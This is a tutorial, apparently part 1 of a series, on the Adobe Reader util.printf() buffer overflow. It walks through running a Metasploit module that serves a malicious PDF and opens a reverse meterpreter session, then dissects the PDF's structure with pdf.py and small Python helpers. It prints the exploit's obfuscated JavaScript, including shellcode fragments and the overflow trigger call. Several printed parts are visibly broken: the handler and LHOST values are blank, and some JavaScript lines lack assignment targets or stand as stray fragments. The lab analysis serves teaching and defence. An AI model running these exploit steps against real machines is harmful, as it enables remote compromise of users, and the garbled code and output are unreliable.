Hacking PDF: util.printf() Buffer Overflow: Part 1

1. Introduction

The first thing we need to do is uninstall the version of Adobe PDF Reader we currently have installed and install an old version of Adobe PDF Reader instead.

Old versions of Adobe PDF Reader can be found on various web pages, but the most prominent one is probably OldApps. We need a specific version of Adobe PDF Reader that is vulnerable to the util.printf() buffer overflow. But which version do we need? Luckily, an exploit for the util.printf() buffer overflow vulnerability is available as a Metasploit module, as we can see in the picture below:


Adobe PDF Reader versions up to and including 8.1.2 are vulnerable, so we need to download version 8.1.2 from the OldApps web page and install it on the system. The installation process of the old, vulnerable PDF Reader can be observed below:


When the installation process is complete, we can check whether the appropriate version was installed on the system. To do that, we start Adobe PDF Reader normally and select Help - About Adobe Reader 8 from the menu bar. We should see the dialog presented below:


The right version of Adobe Reader, version 8.1.2, is installed. Now we've come to the part where we need to test the Metasploit module. To do that, we must download Metasploit, start msfconsole, and execute the commands below:

msf > use exploit/windows/browser/adobe_utilprintf
msf exploit(adobe_utilprintf) > set PAYLOAD
msf exploit(adobe_utilprintf) > set LHOST 1
msf exploit(adobe_utilprintf) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on
[*] Using URL:
[*] Local IP:
[*] Server started.

First we select the adobe_utilprintf exploit with the use command. Then we set the Metasploit variables that are required for everything to work: PAYLOAD, which specifies the payload that will be executed once the exploit succeeds, and LHOST, which sets the IP address of our attacking machine. The payload uses this IP address to connect back to us, creating a reverse meterpreter session that gives us control over the compromised computer with the privileges of the user who opened the document. Finally, we run the exploit command, which starts a web server in the background that serves the malicious PDF document.

We can download the generated malicious PDF from the URL that Metasploit printed and save it on our hard drive as util_printf.pdf. Then we copy it to the target machine (the one running the vulnerable version of Adobe PDF Reader) and open it.

When we open the malicious PDF document in the vulnerable Adobe PDF Reader, a new meterpreter session should be opened, as can be seen in the picture below:


We can then use the newly created session to interact with the compromised computer. This can be seen in the picture below, where we first enter the new session with the "sessions -i 1" command and then execute the sysinfo command, which gives us basic information about the compromised system. In our case, this is a Windows XP SP2 machine running on the x86 (32-bit) architecture.


2. Analyzing the PDF Document

The exploit works and gives us the meterpreter session that we want, so why should we care about the details of how this is done? Well, the beauty of everything is in the details, so in this section we'll take a look at how the malicious PDF document was created and how it uses the vulnerable function to execute arbitrary code on the vulnerable computer.

If we open util_printf.pdf in a text editor like gvim, we can get some information out of it, but not all of it. For example, the header of the PDF document is presented in the picture below:


It's a standard PDF 1.5 document whose second line is a comment containing four non-ASCII bytes (byte values of 128 or higher). The PDF specification recommends such a line whenever a file contains binary data: applications that read the first few bytes of a file to decide how to handle it (file transfer programs, for example) will then treat the document as binary data rather than ASCII text, which could otherwise corrupt it. Next comes the Body section of the PDF document, presented in the picture below:


We can't say anything definitive about this section yet, except that it uses many different representations of single characters. In a PDF name, the # character followed by two hexadecimal digits represents a single byte; for example, /#54#79p#65 is simply /Type. This could easily be converted back into ASCII, but we won't do that manually, because it's inefficient and too time-consuming (in the modern world we have computers to do the work for us).
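Here is a minimal Python sketch of that conversion, using a regular expression to replace each #xx escape with the byte it encodes. It should only be applied to dictionary text such as names, because a # inside a string or stream does not have this meaning. The helper name decode_name_escapes is hypothetical; the sample input is the raw catalog dictionary that pdf.py prints for object 1 later in this article.

```python
import re

# In a PDF name, '#' followed by two hex digits stands for one byte.
_NAME_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")


def decode_name_escapes(data: bytes) -> bytes:
    """Replace every #xx escape with the single byte it encodes."""
    return _NAME_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


obfuscated = (
    b"<</#54#79p#65/Ca#74a#6c#6fg/#4f#75tli#6e#65s 2 0 R"
    b"/#50a#67#65s 3 0 R/#4fp#65n#41ct#69#6f#6e 5 0 R>>"
)
print(decode_name_escapes(obfuscated).decode("latin-1"))
```

Running it prints <</Type/Catalog/Outlines 2 0 R/Pages 3 0 R/OpenAction 5 0 R>>, which is exactly the catalog structure we'll see again in the pdf.py output.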

The picture of the Body section also shows one encoded (compressed) stream, which is not readable in its current form. On line 29 the stream is terminated by the endstream keyword, and on line 30 the object is closed by the endobj keyword. Next comes the cross-reference (xref) table, which we can see in the following picture:


The cross-reference table contains seven entries: entry 0 plus six objects. The first entry, with offset 0 and generation number 65535, is always present and does not correspond to a real object (it is the head of the list of free entries). Each following line describes one object. The first object is located at byte offset 17 and has generation number 0. In fact, all of the objects have generation number 0, because the PDF document has just been created and no object has been deleted and had its object number reused, which is what increments a generation number. The cross-reference table is clear and provides just the information that we need: there are six objects in use, each at a different byte offset in the body of the PDF document (which is compressed and obfuscated).
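The fixed-width layout of the table makes it easy to parse: each entry is a 10-digit byte offset, a 5-digit generation number, and n (in use) or f (free). The following is a minimal Python sketch; only entries 0 and 1 of the sample come from the table described above, the remaining offsets are hypothetical placeholders, and parse_xref is our own helper that handles a classic xref table only (not cross-reference streams).

```python
import re
from typing import List, Tuple

# A subsection header gives the first object number and the entry count.
_SUBSECTION = re.compile(rb"^(\d+) (\d+)$")
# Each entry: 10-digit byte offset, 5-digit generation, 'n' (in use) or 'f' (free).
_ENTRY = re.compile(rb"^(\d{10}) (\d{5}) ([nf])$")


def parse_xref(text: bytes) -> List[Tuple[int, int, int, str]]:
    """Return (object number, offset, generation, kind) for each xref entry."""
    entries = []
    next_obj = 0
    for raw_line in re.split(rb"\r\n|\r|\n", text):
        line = raw_line.strip()
        if not line or line == b"xref":
            continue
        if line.startswith(b"trailer"):
            break
        entry = _ENTRY.match(line)
        if entry:
            offset, generation, kind = entry.groups()
            entries.append((next_obj, int(offset), int(generation), kind.decode("ascii")))
            next_obj += 1
            continue
        header = _SUBSECTION.match(line)
        if header:
            next_obj = int(header.group(1))
    return entries


# Entries 0 and 1 match the table described above; other offsets are hypothetical.
SAMPLE = (
    b"xref\n"
    b"0 7\n"
    b"0000000000 65535 f \n"
    b"0000000017 00000 n \n"
    b"0000000120 00000 n \n"
    b"0000000180 00000 n \n"
    b"0000000250 00000 n \n"
    b"0000000330 00000 n \n"
    b"0000000420 00000 n \n"
    b"trailer\n"
)

for number, offset, generation, kind in parse_xref(SAMPLE):
    if kind == "n":
        print(f"object {number}: offset {offset}, generation {generation}")
```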

What follows is the Trailer section of the PDF document represented in the picture below:


The trailer contains the /Root entry, which specifies that the root object (the document catalog) is the object with ID 1. There's also the /Size entry, whose value 7 is the number of entries in the cross-reference table: one more than the highest object number (6), because entry 0 is counted as well. Afterwards there's the startxref keyword, which specifies that the cross-reference table starts at byte offset 6386. The last line contains the %%EOF marker, which ends the PDF file.
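A PDF reader starts parsing at the end of the file: it finds startxref, jumps to the cross-reference table at that offset, and reads the trailer to locate the root object. Below is a minimal Python sketch of reading the startxref offset and the trailer entries, assuming a single uncompressed trailer whose names are not obfuscated with #xx escapes. The sample tail uses the values described above; find_startxref and parse_trailer are hypothetical helper names.

```python
import re
from typing import Dict, Optional


def find_startxref(data: bytes) -> Optional[int]:
    """Return the offset written after the last 'startxref' keyword."""
    # The keyword sits just before %%EOF, so scanning the tail is enough.
    matches = re.findall(rb"startxref\s+(\d+)\s+%%EOF", data[-1024:])
    return int(matches[-1]) if matches else None


def parse_trailer(data: bytes) -> Dict[str, object]:
    """Read /Size and /Root from the last trailer dictionary in the file."""
    start = data.rfind(b"trailer")
    if start == -1:
        raise ValueError("no trailer keyword found")
    end = data.find(b"startxref", start)
    trailer = data[start:end] if end != -1 else data[start:]
    size = re.search(rb"/Size\s+(\d+)", trailer)
    root = re.search(rb"/Root\s+(\d+)\s+(\d+)\s+R", trailer)
    return {
        "Size": int(size.group(1)) if size else None,
        "Root": (int(root.group(1)), int(root.group(2))) if root else None,
    }


# Tail of a file carrying the trailer values described above.
tail = b"trailer\n<</Size 7/Root 1 0 R>>\nstartxref\n6386\n%%EOF\n"
print(find_startxref(tail), parse_trailer(tail))
```

The /Size value of 7 is one more than the highest object number, 6, which is a quick consistency check against the cross-reference table.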

So far we've gathered quite a lot of information about the malicious PDF document, but there's still one section that needs to be analyzed: the Body section. We must be aware that PDF documents can use several filters to compress or encode specific objects, which makes them unreadable in plain-text form. Therefore we can't simply read the objects from the PDF file; we first need to decode or decompress them. There are several tools that we can use to do just that.
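Before any filter can be applied, the raw stream bytes have to be cut out of the object. They sit between the stream and endstream keywords, and the stream dictionary's /Length entry gives their exact size. The following is a minimal Python sketch, assuming the stream keyword directly follows the dictionary's closing >> and is followed by CRLF or LF, as the PDF specification requires. extract_stream and the sample object are hypothetical, and the returned bytes are still encoded.

```python
import re
from typing import Optional


def extract_stream(obj: bytes, length: Optional[int] = None) -> bytes:
    """Return the raw (still encoded) bytes between 'stream' and 'endstream'."""
    # Find the 'stream' keyword after the dictionary's '>>' and its CRLF/LF.
    start = re.search(rb">>\s*stream\r?\n", obj)
    if start is None:
        raise ValueError("no stream keyword found")
    begin = start.end()
    if length is not None:
        # Prefer the /Length value from the stream dictionary when it is known.
        return obj[begin:begin + length]
    end = obj.find(b"endstream", begin)
    if end == -1:
        raise ValueError("no endstream keyword found")
    data = obj[begin:end]
    # Drop the end-of-line marker that precedes 'endstream'.
    if data.endswith(b"\r\n"):
        return data[:-2]
    if data.endswith((b"\n", b"\r")):
        return data[:-1]
    return data


sample = b"6 0 obj\n<</Length 5>>\nstream\nhello\nendstream\nendobj\n"
print(extract_stream(sample), extract_stream(sample, length=5))
```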

In the sections that follow, we'll present various tools that can be used to analyze malicious files. We'll also pretend that we don't know anything about the PDF document we're analyzing, so we'll try almost every available method to determine whether the PDF document is malicious and how it works.

3. Checking for Malicious JavaScript

We must be aware that Adobe PDF Reader uses some open source software components to provide certain features. We can get all the information about the open source software that Adobe PDF Reader uses at the following URI: http://partners.adobe.com/public/developer/opensource/index.html. It uses a modified version of the Mozilla SpiderMonkey JavaScript engine, which is freely available (the "Modified SpiderMonkey" download). It also uses the Sablotron XSLT processor and the SAXON XSLT processor, which we won't describe in detail, since they are not needed right now.

JavaScript inside PDF documents is often compressed, which makes analyzing the document harder and can even help it evade antivirus or IDS/IPS software. However, the jsunpack-n JavaScript unpacker includes a tool named pdf.py that can extract and decompress the JavaScript from a PDF document. The pdf.py Python script can handle data encoded with the following PDF filters: FlateDecode, ASCIIHexDecode, ASCII85Decode, LZWDecode and RunLengthDecode.
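To see what such decoding involves, here is a minimal Python sketch of the two filters our document turns out to use, FlateDecode (zlib) and ASCIIHexDecode, applied as a chain. It assumes the filters are applied in the order they are listed in the /Filter array, which is how the PDF specification defines decoding. This is our own illustration, not pdf.py's implementation, and the sample script is a harmless placeholder.

```python
import zlib
from typing import Callable, Dict, List

# Whitespace characters defined by the PDF specification.
PDF_WHITESPACE = b" \t\r\n\x0c\x00"


def ascii_hex_decode(data: bytes) -> bytes:
    """ASCIIHexDecode: hex digit pairs, whitespace ignored, '>' ends the data."""
    digits = bytearray()
    for byte in data:
        if byte == ord(">"):
            break
        if byte in PDF_WHITESPACE:
            continue
        digits.append(byte)
    if len(digits) % 2:
        # An odd final digit is treated as if it were followed by '0'.
        digits.append(ord("0"))
    return bytes.fromhex(digits.decode("ascii"))


def flate_decode(data: bytes) -> bytes:
    """FlateDecode: zlib/deflate-compressed data."""
    return zlib.decompress(data)


DECODERS: Dict[str, Callable[[bytes], bytes]] = {
    "FlateDecode": flate_decode,
    "ASCIIHexDecode": ascii_hex_decode,
}


def apply_filters(data: bytes, filters: List[str]) -> bytes:
    """Decode stream data by applying the /Filter entries in the listed order."""
    for name in filters:
        data = DECODERS[name](data)  # KeyError for filters this sketch lacks
    return data


# A harmless placeholder script, encoded the way object 6 is laid out:
# hex-encode first, then compress, so decoding runs Flate, then ASCIIHex.
script = b"var answer = 42;"
encoded = zlib.compress(script.hex().encode("ascii") + b">")
print(apply_filters(encoded, ["FlateDecode", "ASCIIHexDecode"]))
```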

We can decompress the compressed data in PDF document util_printf.pdf with the following command:

# python pdf.py util_printf.pdf

When we run the above command, we get the following output, which prints all the objects in the PDF document. Previously we found out that the PDF document uses six objects with IDs 1 through 6. The first part of the output presents the attributes of each object. The object with ID 1 is the document catalog, which specifies the root node of the document's page tree (the object with ID 3). The outlines object has ID 2.

The catalog's /OpenAction entry (here pointing to object 5) specifies a destination that shall be displayed or an action that shall be performed when the document is opened. Its value can be an array defining a destination or an action dictionary representing an action. If this entry is not present, the document is opened on the first page by default.

# python pdf.py util_printf.pdf
parsing util_printf.pdf
obj 1 0:
tag Type (TAG)
tag Catalog (TAG)
tag Outlines = 2 0 R (TAGVAL)
tag Pages = 3 0 R (TAGVAL)
tag OpenAction = 5 0 R (ENDTAG)
obj 2 0:
tag Type (TAG)
tag Outlines (TAG)
tag Count = 0 (ENDTAG)
obj 3 0:
tag Type (TAG)
tag Pages (TAG)
tag Kids = 4 0 R] (TAGVAL)
tag Count = 1 (ENDTAG)
obj 4 0:
tag Type (TAG)
tag Page (TAG)
tag Parent = 3 0 R (TAGVAL)
tag MediaBox = 0 0 612 792] (ENDTAG)
obj 5 0:
tag Type (TAG)
tag Action (TAG)
tag S (TAG)
tag JavaScript (TAG)
tag JS = 6 0 R (ENDTAG)
obj 6 0:
tag Length = 5853 (TAGVAL)
tag Filter (TAGVAL)
tag FlateDecode (TAG)
tag ASCIIHexDecode (ENDTAG)
obj trailer:
tag Size = 7 (TAGVAL)
tag Root = 1 0 R (ENDTAG)

Found JavaScript (delayed) in 1 0 (0 bytes)
children [['Outlines', '2 0'], ['Pages', '3 0'], ['OpenAction', '5
tags [['TAG', 'Type', ''], ['TAG', 'Catalog', ''], ['TAGVAL',
'Outlines', '2 0 R'], ['TAGVAL', 'Pages', '3 0 R'], ['ENDTAG',
'OpenAction', '5 0 R']]
indata = <</#54#79p#65/Ca#74a#6c#6fg/#4f#75tli#6e#65s 2 0
R/#50a#67#65s 3 0 R/#4fp#65n#41ct#69#6f#6e 5 0 R>>
Found JavaScript (delayed) in 5 0 (0 bytes)
children [['JS', '6 0']]
tags [['TAG', 'Type', ''], ['TAG', 'Action', ''], ['TAG', 'S', ''],
['TAG', 'JavaScript', ''], ['ENDTAG', 'JS', '6 0 R']]
indata = <</Type/A#63#74i#6f#6e/S/Ja#76#61#53cr#69pt/JS 6 0
Found JavaScript in 6 0 (5508 bytes)
children []
tags [['TAGVAL', 'Length', '5853'], ['TAGVAL', 'Filter', ''], ['TAG',
'FlateDecode', ''], ['ENDTAG', 'ASCIIHexDecode', '']]
indata = <</#4cen#67t#68
Wrote JavaScript (5595 bytes -- 87 headers / 5508 code) to file

The relationships between the objects are easier to see in the picture below:


The /Root entry points to the document catalog, which in turn references the Pages, Outlines and OpenAction objects. The most interesting one is the OpenAction entry, which references a JavaScript action (object 5) that is executed when the PDF document is opened. The JavaScript action's /JS entry references object 6, a stream that holds the actual JavaScript code to be executed. The stream is 5853 bytes long in its encoded form (its /Length value) and is decoded with FlateDecode followed by ASCIIHexDecode; the decoded JavaScript is 5508 bytes long.
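The chain from the catalog to the script can also be followed programmatically. The sketch below models the objects from the pdf.py output as a simplified Python dictionary (a hypothetical representation, not pdf.py's data structure) and walks Root, OpenAction and JS. Note that a /JS value can also be a literal string instead of a reference to a stream; this sketch only handles the reference case seen in our document.

```python
from typing import Dict, List, Tuple

# Hypothetical, simplified model of the objects listed by pdf.py.
# Indirect references such as "5 0 R" are stored as plain object numbers.
OBJECTS: Dict[int, Dict[str, object]] = {
    1: {"Type": "Catalog", "Outlines": 2, "Pages": 3, "OpenAction": 5},
    2: {"Type": "Outlines", "Count": 0},
    3: {"Type": "Pages", "Kids": [4], "Count": 1},
    4: {"Type": "Page", "Parent": 3, "MediaBox": [0, 0, 612, 792]},
    5: {"Type": "Action", "S": "JavaScript", "JS": 6},
    6: {"Length": 5853, "Filter": ["FlateDecode", "ASCIIHexDecode"]},
}


def find_open_action_script(
    objects: Dict[int, Dict[str, object]], root: int
) -> Tuple[List[int], int]:
    """Follow Root -> OpenAction -> JS; return the path and the script's object number."""
    catalog = objects[root]
    action_id = catalog["OpenAction"]
    action = objects[action_id]
    if action.get("S") != "JavaScript":
        raise ValueError("OpenAction is not a JavaScript action")
    js_id = action["JS"]
    return [root, action_id, js_id], js_id


path, js_id = find_open_action_script(OBJECTS, root=1)
print(" -> ".join(str(n) for n in path), OBJECTS[js_id]["Filter"])
```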

The pdf.py script above also wrote the extracted JavaScript code to the file util_printf.pdf.out, which is presented below:

c = []; zzzpages.push(c); this.numPages = zzzpages.length;

//jsunpack End PDF headers
var rEjIPqzEByRqKciucyXoQKEoDVmfSgfXhXPTdGqKjKbGNRqlUrIPQvI =
var DYSiOYZIxGfxfSsVwA ="";
DYSiOYZIxGfxfSsVwA += unescape("%u914b%u9814");

= unescape("%u914b%u9814");
fXZbZvta = 20;


< 0x40000)
MdMLejrqWGfyTYiSbrzhcHznoug = new Array();
util.printf("%45000.45000f", 0);

The JavaScript code is currently hard to understand, because it's highly obfuscated. Everything above the comment "jsunpack End PDF headers" was added by the pdf.py script, and everything below that comment is the actual JavaScript extracted from the PDF document. Why did jsunpack add the c, zzzpages.push and this.numPages code to the output file? The extracted JavaScript may try to access objects such as this.numPages that Adobe Reader normally provides, so jsunpack defines them to make the code runnable when it's analyzed outside Adobe Reader.
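If we want to analyze only the extracted code, we can split the output file at the marker comment. Here is a minimal Python sketch, assuming the marker appears exactly as in the output above; split_jsunpack_output is a hypothetical helper name, and the sample body is a placeholder rather than the real extracted script.

```python
from typing import Tuple

MARKER = "//jsunpack End PDF headers"


def split_jsunpack_output(text: str) -> Tuple[str, str]:
    """Split pdf.py output into (emulation headers, extracted JavaScript)."""
    headers, found, code = text.partition(MARKER)
    if not found:
        # No marker: assume the whole file is extracted code.
        return "", text
    return headers, code.lstrip("\r\n")


sample = (
    "c = []; zzzpages.push(c); this.numPages = zzzpages.length;\n"
    "\n"
    "//jsunpack End PDF headers\n"
    "var placeholder = 1;\n"
)
headers, code = split_jsunpack_output(sample)
print(repr(code))
```

For the real file, we could pass it the contents of util_printf.pdf.out instead of the sample string.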

4. Conclusion

We've seen that the JavaScript code in object 6 is executed when the PDF document is opened. But that code is obfuscated, so we can't immediately see what it actually does. In the next part we'll try to determine what the JavaScript code does and whether it really is malicious.